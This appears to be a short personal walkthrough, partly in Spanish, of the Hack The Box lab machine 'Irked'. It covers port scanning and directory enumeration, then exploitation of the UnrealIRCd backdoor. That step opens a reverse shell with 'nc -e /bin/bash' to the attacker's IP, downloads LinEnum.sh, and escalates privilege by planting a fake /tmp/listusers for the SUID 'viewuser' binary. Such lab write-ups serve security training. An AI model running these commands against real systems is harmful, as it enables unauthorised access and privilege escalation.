echo "10.129.1.108 irked.htb" | sudo tee -a /etc/hosts

nmap -A -p- -oA output 10.129.1.108 --min-rate=10000 --script=vuln --script-timeout=15 -v

Pasted image 20210306092350.png

nmap -sC -sV -O -p- -oA full 10.129.1.108

nmap -sU -O -p- -oA udp 10.129.1.108

rustscan --accessible -a irked.htb -r 1-65535 -- -sT -sV -sC -Pn

nikto -h 10.129.1.190:80

gobuster dir -k -u http://10.129.1.108 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

Pasted image 20210306093951.png

Pasted image 20210306093221.png

El directorio /manual nos manda a la pagina por defecto de apache

Pasted image 20210306093643.png

Vemos los puertos 22 y 111 corriendo OpenSSH 6.7p1 y rpcbind 2–4. Puertos 6697, 8067 & 65534 estab corriendo UnrealIRCd.

ls -l /usr/share/nmap/scripts/irc*

Pasted image 20210306094059.png

nmap -p 6697,8067,65534 --script irc-unrealircd-backdoor 10.129.1.108

Pasted image 20210306094457.png

rlwrap nc -lvnp 5555

Pasted image 20210306095252.png

nmap -p 8067 --script=irc-unrealircd-backdoor --script-args=irc-unrealircd-backdoor.command="nc -e /bin/bash 10.10.14.80 5555" 10.129.1.108

Pasted image 20210306095314.png

Actualizamos el shell

python -c 'import pty; pty.spawn("/bin/bash")'

(CTRL+ Z)

stty raw -echo

fg

Pasted image 20210306095649.png

cd /tmp wget http://10.10.14.80:5555/LinEnum.sh

chmod +x LinEnum.sh

Pasted image 20210306103825.png

Pasted image 20210306103939.png

echo "/bin/bash" > /tmp/listusers chmod +x /tmp/listusers :/tmp$ viewuser

Pasted image 20210306104803.png

boxes

copyright©2022 Cu3rv0x all rights reserved